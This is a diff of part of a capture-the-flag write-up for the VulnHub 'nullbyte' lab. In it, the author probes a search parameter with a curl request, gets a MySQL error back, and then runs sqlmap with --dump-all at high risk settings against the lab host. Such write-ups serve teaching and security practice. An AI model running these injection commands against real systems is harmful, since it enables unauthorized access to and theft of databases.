740i/Writeups/nullbyte/nullbyte.md

 So by accident I submit it with nothing and it spits back a couple employees...

 ![](pics/5.PNG)

 We also see a nice sql error if you submit with "".
 ```
 root@sushi:~/vulnhub/nullbyte# curl http://192.168.147.166/kzMb5nVYJw/420search.php?usrtosearch=%27%27%22
 Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%"' at line 1
 ```
-At this point we get stuck for awhile trying to get anything from this, and then eventually just give up and use sqlmap.
+At this point we get stuck for awhile trying to get anything from this sql error, and then eventually just give up and use sqlmap.
 ```
 root@sushi:~# sqlmap --url="http://192.168.147.166/kzMb5nVYJw/420search.php?usrtosearch=a*" --dbms=MySQL --dump-all --level=5 --risk=3
 ```